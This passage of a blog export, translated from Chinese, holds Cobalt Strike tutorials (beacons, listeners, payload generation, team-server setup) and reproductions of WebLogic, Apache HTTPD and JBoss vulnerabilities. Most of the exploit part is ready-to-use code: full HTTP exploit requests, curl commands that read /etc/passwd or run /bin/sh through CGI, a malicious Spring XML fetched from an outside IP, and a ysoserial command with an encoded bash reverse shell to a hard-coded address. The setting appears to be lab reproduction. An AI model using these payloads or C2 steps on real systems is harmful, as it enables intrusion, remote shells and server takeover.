<content type="html"><![CDATA[<h2 id="3-Cobaltstrike-Beacon与菜单栏、视图"><a href="#3-Cobaltstrike-Beacon与菜单栏、视图" class="headerlink" title="3. Cobaltstrike Beacon, menu bar and views"></a>3. Cobaltstrike Beacon, menu bar and views</h2><h3 id="一、Beacon详解"><a href="#一、Beacon详解" class="headerlink" title="I. Beacon in detail"></a>I. Beacon in detail</h3><p>Right-click a target and choose Interact to open its Beacon console, from which you can run commands on the host.<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605853_20200820195323098_28548.png"></p><ul><li><p>In Cobalt Strike the default check-in interval is 60 s: after issuing a command you wait up to 60 seconds for the result, because the target host contacts the team server only once a minute. That makes interactive work tedious.</p></li><li><p>Set the sleep to 3 seconds:<br><code>sleep 3</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605853_20200820200116977_32605.png"></p></li></ul><h3 id="二、Cobalt-Strike多种beacon"><a href="#二、Cobalt-Strike多种beacon" class="headerlink" title="II. The different kinds of Beacon"></a>II. The different kinds of Beacon</h3><ul><li><strong>1. The HTTP Beacon and the TCP Beacon are the two ordinary ones; they differ only in the protocol the host uses to talk to the team server.</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820201848361_24834.png"> <img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820201821895_4198.png"></li><li><strong>2. SMB Beacon</strong><br>Official description: the SMB Beacon communicates through a parent Beacon over a named pipe. Once the two Beacons are linked, the <strong>child Beacon</strong> <strong>receives its tasks from the parent Beacon</strong> and sends its output back through it.</li><li><em>Because the linked Beacons communicate over a Windows named pipe, and that traffic is carried inside the SMB protocol, the SMB Beacon is relatively stealthy and can get past some firewalls.</em><br>This diagram illustrates the SMB Beacon workflow well:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820202651724_29752.png"></li><li><strong>3. Using the SMB Beacon</strong><br>This type of Beacon requires the host running it to accept connections on port 445.<br>To spawn an SMB Beacon:<br>create an SMB Beacon listener under Listeners > select the target host > right-click > Spawn As > choose that listener > the new session comes back<br>or, in a Beacon console, run <code>spawn SMB Beacon</code> (where "SMB Beacon" is the name of my SMB Beacon listener)<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820203618393_15109.png"><br>When it succeeds, the ∞∞ symbol appears in the session list: that is the spawned SMB Beacon.<br>It is currently linked; from a Beacon you can link it with <code>link &lt;ip&gt;</code> or disconnect it with <code>unlink &lt;ip&gt;</code>.<br>This Beacon is used heavily in lateral movement within internal networks, which is not covered here.<br>You can also copy the generated SMB Beacon to a target host over IPC$ and run it there, but the host will not show up on its own: you have to connect to it yourself with the link command (<code>link &lt;ip&gt;</code>).</li><li>4. SMB Beacon example<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820205233195_8561.png"></li><li>Log in with psexec, using the SMB Beacon listener and selecting the child Beacon<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820205338313_20479.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605855_20200820205537939_5588.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605855_20200820205738422_11021.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605855_20200820205822871_31672.png"></li></ul>]]></content>
<categories>
<category> Internal Network Penetration </category>
</categories>
<tags>
<tag> CobaltStrike </tag>
</tags>
</entry>
<entry>
<title>2. Cobaltstrike Listeners and Payload Generation</title>
<link href="/article/b916b10c.html"/>
<url>/article/b916b10c.html</url>
<content type="html"><![CDATA[<h2 id="2-Cobaltstrike-Listener与Payload生成"><a href="#2-Cobaltstrike-Listener与Payload生成" class="headerlink" title="2. Cobaltstrike listeners and payload generation"></a>2. Cobaltstrike listeners and payload generation</h2><h3 id="一、Listener介绍"><a href="#一、Listener介绍" class="headerlink" title="I. What a listener is"></a>I. What a listener is</h3><ul><li>Listener: an object dedicated to watching for events or state changes on other objects and handling them.<br>When something happens on the object being watched, it reacts immediately.</li><li>Many penetration-testing tools, such as Empire, Metasploit and Cobalt Strike, have listeners.<br>Put simply, the listener is the module that receives the connection back from the target host.</li></ul><h3 id="二、Listener创建"><a href="#二、Listener创建" class="headerlink" title="II. Creating a listener"></a>II. Creating a listener</h3><p>To create a listener:<br>Cobaltstrike -> Listeners<br>I am currently using Cobaltstrike 4.0, which ships with eight listener types:</p><pre class="line-numbers language-none"><code class="language-none">1. windows/beacon_dns/reverse_dns_txt
2. windows/beacon_http/reverse_http
3. windows/beacon_https/reverse_https
4. windows/beacon_bind_pipe
5. windows/beacon_tcp
6. windows/beacon_extc2
7. windows/foreign/reverse_http
8. windows/foreign/reverse_https</code></pre><ul><li><strong>windows/beacon</strong> are the built-in listeners, covering <strong>six transports: dns, http, https, smb, tcp and extc2</strong>;</li><li><strong>windows/foreign are the foreign (external) listeners</strong></li></ul><p>Beacon is Cobalt Strike's own listener: when the payload runs successfully on the target, a Beacon shell is returned to Cobalt Strike.<br>The foreign listeners hand the session to an external tool, for example when you want Cobalt Strike to spawn a Meterpreter session. How to integrate Cobaltstrike with MSF and Armitage is covered later.<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820171004832_18852.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820171032405_13712.png"></p><h3 id="三、Cobaltstrike生成后门"><a href="#三、Cobaltstrike生成后门" class="headerlink" title="III. Generating a payload with Cobaltstrike"></a>III. Generating a payload with Cobaltstrike</h3><ul><li><p><strong>Location: Attacks -> Packages (the items marked in red are the commonly used ones)</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820172003278_28687.png"></p></li><li><p><strong>Generate a PowerShell payload to bring the host online (learn the other payload types on your own)</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820172751877_18796.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605832_20200820172843581_20646.png"></p></li><li><p><strong>Run it in a command prompt or PowerShell on the target host</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605832_20200820173046615_25292.png"></p></li><li><p><strong>The host comes online...</strong></p></li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605832_20200820173118299_27983.png"></p>]]></content>
<categories>
<category> Internal Network Penetration </category>
</categories>
<tags>
<tag> CobaltStrike </tag>
</tags>
</entry>
<entry>
<title>1. Cobaltstrike Installation and Overview</title>
<link href="/article/a8d93643.html"/>
<url>/article/a8d93643.html</url>
<content type="html"><![CDATA[<h2 id="1-Cobaltstrike-安装与简介"><a href="#1-Cobaltstrike-安装与简介" class="headerlink" title="1. Cobaltstrike installation and overview"></a>1. Cobaltstrike installation and overview</h2><h3 id="一、简介"><a href="#一、简介" class="headerlink" title="I. Overview"></a>I. Overview</h3><p>Cobalt Strike is a penetration-testing tool developed for red teams in the US and commonly known in the industry as CS.<br>Since last year, when Cobaltstrike moved to version 3.0 and dropped its dependency on the MSF framework, it has become hugely popular in the Chinese security community and an indispensable part of penetration testing.<br>It can bring hosts online over several protocols and integrates privilege escalation, credential dumping, port forwarding, SOCKS proxying, Office attacks, file bundling, phishing and more.<br>Cobalt Strike can also invoke other well-known tools such as Mimikatz, which is why it is so popular with hackers.<br>The current version is 4.1.<br>Project website: https://www.cobaltstrike.com</p><h3 id="二、cobaltstike的架构"><a href="#二、cobaltstike的架构" class="headerlink" title="II. Cobaltstrike file layout"></a>II. Cobaltstrike file layout</h3><p>I use Cobaltstrike 4.0. The official release is already at 4.1, but there have recently been claims that it contains a backdoor, so it is not recommended.<br>The file layout of version 3.13 is as follows.</p><p>│ Scripts plugins installed by the user<br>│ Log daily logs<br>│ c2lint checks a profile for errors<br>│ cobaltstrike<br>│ cobaltstrike.jar client program<br>│ icon.jpg logo<br>│ license.pdf licence file<br>│ readme.txt<br>│ releasenotes.txt<br>│ teamserver server program<br>│ update<br>│ update.jar updater<br>└─third-party third-party tools, containing vnc d</p><h3 id="三、Cobaltstrike安装"><a href="#三、Cobaltstrike安装" class="headerlink" title="III. Installing Cobaltstrike"></a>III. Installing Cobaltstrike</h3><ul><li>1. Linux environment setup example (Java and the JDK must be installed first): Ubuntu 16.04 is recommended<pre class="line-numbers language-none"><code class="language-none">Install the Java JDK:
sudo apt-get update                  # refresh the package list
sudo apt-get install openjdk-8-jdk   # install openjdk-8-jdk
java -version                        # check the Java version
apt-get install screen               # screen, for running in the background</code></pre><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605839_20200820153105091_21017.png"></li><li>2. Upload the Cobaltstrike package to the server</li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820153633259_478.png"></p><ul><li>3. Setting up the team server</li></ul><pre class="line-numbers language-none"><code class="language-none">cd cobaltstrike4.0      # enter the cobaltstrike4.0 directory
ls                      # list the files in the directory
chmod 777 teamserver    # give the team server full permissions, or at least execute permission (being lazy here, I just use 777)
vim teamserver          # edit the port and fingerprint settings; changing the default SSL certificate details is also important, otherwise the server is easily identified. It helps guard against 0days, so change them</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160335579_23479.png"></p><ul><li>4. Running it</li></ul><pre class="line-numbers language-none"><code class="language-none">screen ./teamserver ip password    # option 1: run in the background on Linux
nohup ./teamserver ip password &    # option 2: run in the background on Linux (recommended)</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160416500_31271.png"><br>On Windows, just run start.bat<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160606921_6852.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160529056_1736.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160634813_7205.png"><br>Tool download: <a href="https://pan.baidu.com/s/1BA61luBY6mktNf7DFzzMhg">https://pan.baidu.com/s/1BA61luBY6mktNf7DFzzMhg</a> extraction code: qwer</p>]]></content>
<categories>
<category> Internal Network Penetration </category>
</categories>
<tags>
<tag> CobaltStrike </tag>
</tags>
</entry>
<entry>
<title>CVE-2020-[14750, 14882, 14883] WebLogic Unauthenticated Command Execution Reproduction</title>
<link href="/article/a1981ad3.html"/>
<url>/article/a1981ad3.html</url>
<content type="html"><![CDATA[<h3 id="简述"><a href="#简述" class="headerlink" title="Summary"></a>Summary</h3><p>WebLogic is an application server from Oracle (US), more precisely a middleware product built on the Java EE architecture: a Java application server for developing, integrating, deploying and managing large distributed web, network and database applications.</p><h3 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="Vulnerability overview"></a>Vulnerability overview</h3><p>An unauthenticated remote attacker can send a specially crafted HTTP GET request to execute arbitrary code on an affected WebLogic Server.</p><h3 id="影响版本"><a href="#影响版本" class="headerlink" title="Affected versions"></a>Affected versions</h3><pre class="line-numbers language-none"><code class="language-none">Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0</code></pre><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="Environment setup"></a>Environment setup</h3><p>The version tested here is WebLogic 12.2.1.4<br>Download:<br><code>https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607251_20201030221957753_18260.png"><br>Java version:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607251_20201030224810393_9486.png"><br>Run the installer with administrator privileges<br><code>java -jar fmw_12.2.1.4.0_wls_lite_generic.jar</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607252_20201030230430097_15519.png"><br>Accept the defaults and choose the complete installation with examples<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607252_20201030230552878_22117.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607252_20201030231039244_20374.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030231512877_6310.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030231528165_18174.png"><br>Visit<br><code>http://Your ip:7001/console</code><br>If the login page appears, the installation succeeded<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030231706187_26897.png"></p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="Reproduction"></a>Reproduction</h3><h4 id="CVE-2020-14750-权限绕过漏洞"><a href="#CVE-2020-14750-权限绕过漏洞" class="headerlink" title="CVE-2020-14750: authentication bypass"></a>CVE-2020-14750: authentication bypass</h4><p>A remote attacker can craft an HTTP request that takes over the WebLogic Server Console without authentication and from there execute arbitrary code.</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP:7001/console/images/%252E./console.portal</code></pre><h4 id="CVE-2020-14883-权限绕过漏洞"><a href="#CVE-2020-14883-权限绕过漏洞" class="headerlink" title="CVE-2020-14883: authentication bypass"></a>CVE-2020-14883: authentication bypass</h4><p>A remote attacker can craft an HTTP request that takes over the WebLogic Server Console without authentication.<br>Authentication bypass (CVE-2020-14882): visiting the following URL gives unauthenticated access to the admin console (as a low-privilege user):</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP:7001/console/css/%252e%252e%252fconsole.portal</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/2722623180160.png"></p><center>We are now a low-privilege user and cannot deploy applications, so we chain this with CVE-2020-14882 below to go further</center><hr><h4 id="CVE-2020-14882-代码执行漏洞"><a href="#CVE-2020-14882-代码执行漏洞" class="headerlink" title="CVE-2020-14882: code execution"></a>CVE-2020-14882: code execution</h4><p>First the access control is bypassed with the illegal characters, then a gadget is used to run a command; the PoC is as follows</p><pre class="line-numbers language-none"><code class="language-none">GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1
Host: 192.168.3.189:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADM
Upgrade-Insecure-Requests: 1</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201030232437984_680.png"><br>The calculator pops up<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030232257621_24179.png"><br>Remediation<br>Install the latest patch<br>Oracle's official patches require a licence account for the genuine software; log in to <a href="https://support.oracle.com">https://support.oracle.com</a> with that account to download the latest patch.</p><hr><h2 id="linux下Weblogic-CVE-2020-14882,CVE-2020-14883"><a href="#linux下Weblogic-CVE-2020-14882,CVE-2020-14883" class="headerlink" title="WebLogic on Linux (CVE-2020-14882, CVE-2020-14883)"></a>WebLogic on Linux (CVE-2020-14882, CVE-2020-14883)</h2><p>WebLogic is Oracle's J2EE application server. In its October 2020 update, Oracle fixed two vulnerabilities reported by @voidfyoo of Chaitin Tech: CVE-2020-14882 and CVE-2020-14883.</p><p>CVE-2020-14882 lets an unauthenticated user bypass the admin console's authentication and reach the console; CVE-2020-14883 lets any console user execute arbitrary commands over HTTP. Chained together, they allow arbitrary command execution on a remote WebLogic server, as an unauthenticated user, with a single GET request.</p><h3 id="环境搭建-1"><a href="#环境搭建-1" class="headerlink" title="Environment setup"></a>Environment setup</h3><p>Using vulhub: <code>docker-compose up -d</code><br>Once it is up, visit <code>http://your-ip:7001/console</code> to see the console login page.</p><h3 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="Reproduction"></a>Reproduction</h3><p>First test the authentication bypass (CVE-2020-14882): visiting the following URL gives unauthenticated access to the admin console:<br><code>http://your-ip:7001/console/css/%252e%252e%252fconsole.portal</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103154530307_25132.png"><br>Once in the console we find that we are a low-privilege user who cannot deploy applications, so we cannot execute arbitrary code directly:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103154625824_20719.png"><br>At this point the second vulnerability, CVE-2020-14883, is needed. It can be exploited in two ways:<br>one via <code>com.tangosol.coherence.mvel2.sh.ShellSession</code><br>the other via <code>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</code><br>Visiting the following URL runs a command through com.tangosol.coherence.mvel2.sh.ShellSession:</p><pre class="line-numbers language-none"><code class="language-none">http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")</code></pre><p>Inside the container we can see that touch /tmp/success1 has run:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103155601050_1486.png"><br>This method only works on WebLogic 12.2.1 and above, because 10.3.6 does not have the <code>com.tangosol.coherence.mvel2.sh.ShellSession</code> class.<br><code>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</code> is a more universal method, first described for CVE-2019-2725, and works on all WebLogic versions.</p><p><strong>First we build an XML file and host it on a server the WebLogic host can reach, for example <a href="http://8.210.235.249/RCE.xml">http://8.210.235.249/RCE.xml</a>:</strong></p><pre class="line-numbers language-xml" data-language="xml"><code class="language-xml">&lt;?xml version="1.0" encoding="UTF-8" ?&gt;
&lt;beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"&gt;
  &lt;bean id="pb" class="java.lang.ProcessBuilder" init-method="start"&gt;
    &lt;constructor-arg&gt;
      &lt;list&gt;
        &lt;value&gt;bash&lt;/value&gt;
        &lt;value&gt;-c&lt;/value&gt;
        &lt;value&gt;&lt;![CDATA[touch /tmp/success2]]&gt;&lt;/value&gt;
      &lt;/list&gt;
    &lt;/constructor-arg&gt;
  &lt;/bean&gt;
&lt;/beans&gt;</code></pre><p>Then the following URL makes WebLogic load that XML and run the command in it:</p><pre class="line-numbers language-none"><code class="language-none">http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://8.210.235.249/RCE.xml")</code></pre><p>Python can be used to start a quick web server for this (efficient, fast and easy to watch)<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607254_20201103160222148_3626.png"><br>The malicious XML is loaded successfully<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607255_20201103160351700_16604.png"><br>The drawback of this method is that the WebLogic server must be able to reach the malicious XML.</p><hr><h3 id="反弹shell的一些坑"><a href="#反弹shell的一些坑" class="headerlink" title="Some pitfalls with reverse shells"></a>Some pitfalls with reverse shells</h3><p>Reverse shell on Linux: load a malicious XML that spawns the reverse shell<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607276_20201103161545603_3774.png"></p><pre class="line-numbers language-none"><code class="language-none">http://106.75.229.39:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://your-ip/RCE.xml%22)</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607276_20201103163050170_8883.png"></p><p>I have not managed it on Windows yet, nor the command output echo that many people describe.</p><p>References:<br><code>https://mp.weixin.qq.com/s/48VIwTkyFVXUTS78kNByhg</code><br><code>https://blog.csdn.net/HezhezhiyuLe/article/details/95960479</code><br><code>https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md</code></p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> weblogic </tag>
<tag> CVE-2020-14750 </tag>
<tag> CVE-2020-14882 </tag>
<tag> CVE-2020-14883 </tag>
</tags>
</entry>
<entry>
<title>Apache Parsing Vulnerability (CVE-2017-15715)</title>
<link href="/article/1c1cce96.html"/>
<url>/article/1c1cce96.html</url>
<content type="html"><![CDATA[<h2 id="CVE-2017-15715"><a href="#CVE-2017-15715" class="headerlink" title="CVE-2017-15715"></a>CVE-2017-15715</h2><h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="I. Description"></a>I. Description</h3><p>Apache HTTPD is an HTTP server that can run PHP pages through mod_php. Versions 2.4.0 to 2.4.29 contain a parsing flaw: when handling PHP, a file named 1.php\x0A is treated as having the PHP extension, which bypasses some servers' security policies.</p><h3 id="二、环境搭建"><a href="#二、环境搭建" class="headerlink" title="II. Environment setup"></a>II. Environment setup</h3><p>Vulhub is used</p><h3 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="III. Reproduction"></a>III. Reproduction</h3><p>Uploading a file named six.php is blocked:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606482_20200907160230876_29113.png" alt="img"><br><strong>Insert a \x0A after 1.php (note: it must be a single \x0A, not \x0D\x0A) and the upload is no longer blocked:</strong><br>After the change</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606482_20200908100228730_20905.png" alt="img"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606482_20200908100418532_11097.png" alt="img"></p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> Apache HTTPD </tag>
<tag> CVE-2017-15715 </tag>
</tags>
</entry>
<entry>
<title>Apache HTTP Server 2.4.49 Path Traversal Vulnerability (CVE-2021-41773)</title>
<link href="/article/3ec89881.html"/>
<url>/article/3ec89881.html</url>
<content type="html"><![CDATA[<h2 id="Apache-HTTP-Server-2-4-49-路径穿越漏洞-CVE-2021-41773"><a href="#Apache-HTTP-Server-2-4-49-路径穿越漏洞-CVE-2021-41773" class="headerlink" title="Apache HTTP Server 2.4.49 path traversal vulnerability (CVE-2021-41773)"></a>Apache HTTP Server 2.4.49 path traversal vulnerability (CVE-2021-41773)</h2><h3 id="一、漏洞简介"><a href="#一、漏洞简介" class="headerlink" title="I. Summary"></a>I. Summary</h3><p>Apache HTTP Server is a popular open-source HTTP server from the Apache Foundation. Version 2.4.49 introduced a path traversal vulnerability; an Apache server is affected when both of the following hold:<br>the version is exactly 2.4.49<br>the directory being traversed into is allowed to be accessed, for example because <code>&lt;Directory /&gt;Require all granted&lt;/Directory&gt;</code> is configured (by default it is not allowed)<br>An attacker can use this vulnerability to read files outside the Apache web root, read the source of script files inside the web root, or, on servers with cgi or cgid enabled, execute arbitrary commands.</p><p><strong>References:</strong></p><ul><li><a href="https://httpd.apache.org/security/vulnerabilities_24.html">https://httpd.apache.org/security/vulnerabilities_24.html</a></li><li><a href="https://twitter.com/ptswarm/status/1445376079548624899">https://twitter.com/ptswarm/status/1445376079548624899</a></li><li><a href="https://twitter.com/HackerGautam/status/1445412108863041544">https://twitter.com/HackerGautam/status/1445412108863041544</a></li><li><a href="https://twitter.com/snyff/status/1445565903161102344">https://twitter.com/snyff/status/1445565903161102344</a></li><li><a href="https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md</a></li></ul><h3 id="二、漏洞复现"><a href="#二、漏洞复现" class="headerlink" title="II. Reproduction"></a>II. Reproduction</h3><p>Use the following curl command to send the payload (note that /icons/ must be an existing, accessible directory):<br><code>curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd</code></p><pre class="line-numbers language-none"><code class="language-none">GET //icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 106.55.147.147:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: zh-CN,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Pragma: no-cache
Cache-Control: no-cache</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/2871523259279.png"></p><p>If the cgi or cgid module is enabled on the server, the same path traversal allows arbitrary command execution:<br><code>curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</code><br><code>curl -v --data "echo;id" -x 127.0.0.1:8080 'http://106.55.147.147:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</code><br>-x specifies a proxy</p><pre class="line-numbers language-none"><code class="language-none">POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: Your ip:8080
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/198315816802.png"></p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
<tag> Apache HTTPD </tag>
<tag> CVE-2021-41773 </tag>
</tags>
</entry>
<entry>
<title>JBOSS CVE-2017-12149</title>
<link href="/article/c3936183.html"/>
<url>/article/c3936183.html</url>
<content type="html"><![CDATA[<h2 id="JBOSS-CVE-2017-12149复现"><a href="#JBOSS-CVE-2017-12149复现" class="headerlink" title="Reproducing JBOSS CVE-2017-12149"></a>Reproducing JBOSS CVE-2017-12149</h2><h3 id="一、影响范围"><a href="#一、影响范围" class="headerlink" title="I. Affected versions"></a>I. Affected versions</h3><p>The vulnerability affects JBOSS AS 5.x and 6.x.</p><h3 id="二、漏洞原理"><a href="#二、漏洞原理" class="headerlink" title="II. How the vulnerability works"></a>II. How the vulnerability works</h3><p>JBOSS Application Server is an open-source J2EE application server. JBoss is licensed under the LGPL and can be used freely in any commercial application; Red Hat acquired JBoss in 2006.</p><p>On 30 August 2017, Red Hat published an advisory for a deserialization remote code execution vulnerability in JBOSSAS 5.x. The flaw lies in the ReadOnlyAccessFilter of JBoss's HttpInvoker component: its doFilter method deserializes the serialized data stream sent by the client without any security check or restriction, so an attacker can execute arbitrary code with crafted serialized data. Researchers have since found that JBOSSAS 6.x is also affected. An attacker can exploit the flaw without authentication to run arbitrary commands and take control of the server.</p><h3 id="三、攻击过程"><a href="#三、攻击过程" class="headerlink" title="III. Attack walkthrough"></a>III. Attack walkthrough</h3><p>Open the vulnerable environment<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907102825405_8279.png"><br>Visiting <a href="http://8.210.152.234:8080//invoker/readonly">http://8.210.152.234:8080//invoker/readonly</a> returns a 500 error, which is a strong indication that the vulnerability is present<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907102314863_29332.png"></p><h4 id="1-开启nc监听"><a href="#1-开启nc监听" class="headerlink" title="1. Start an nc listener"></a>1. Start an nc listener</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907102937678_15577.png"></p><h4 id="2-生成反弹shell命令"><a href="#2-生成反弹shell命令" class="headerlink" title="2. Generate the reverse-shell command"></a>2. Generate the reverse-shell command</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907103148639_996.png"></p><h4 id="3-反弹shell命令转换以后得到密令如下"><a href="#3-反弹shell命令转换以后得到密令如下" class="headerlink" title="3. The reverse-shell command after encoding"></a>3. The reverse-shell command after encoding</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606543_20200907103459983_28482.png"></p><h4 id="4-序列化数据生成"><a href="#4-序列化数据生成" class="headerlink" title="4. Generating the serialized payload"></a>4. Generating the serialized payload</h4><p>Generate the serialized data with ysoserial. Because Vulhub uses a fairly recent Java version, the CommonsCollections5 gadget is used; if that does not work, try CommonsCollections6. Any of CommonsCollections1 to 10 may work.</p><pre class="line-numbers language-none"><code class="language-none">java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjIxMC4yMzUuMjQ5Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" >bb.ser</code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907104817445_3967.png"><br>Send the file to the server (curl is recommended; sending it with Burp did not work when I tried)<br>The command is<br><code>curl http://8.210.169.237:8080//invoker/readonly --data-binary @cs.ser</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907104950059_18821.png"></p><h4 id="5-发送完成shell到手"><a href="#5-发送完成shell到手" class="headerlink" title="5. Once sent, the shell comes back"></a>5. Once sent, the shell comes back</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907105040493_6371.png"></p><h3 id="三、一键利用工具推荐"><a href="#三、一键利用工具推荐" class="headerlink" title="IV. Recommended one-click exploit tool"></a>IV. Recommended one-click exploit tool</h3><p><code>https://github.com/yunxu1/jboss-_CVE-2017-12149</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606544_20200907105427737_25318.png"></p>]]></content>
<categories>
<category> Vulnerability Reproduction </category>
</categories>
<tags>
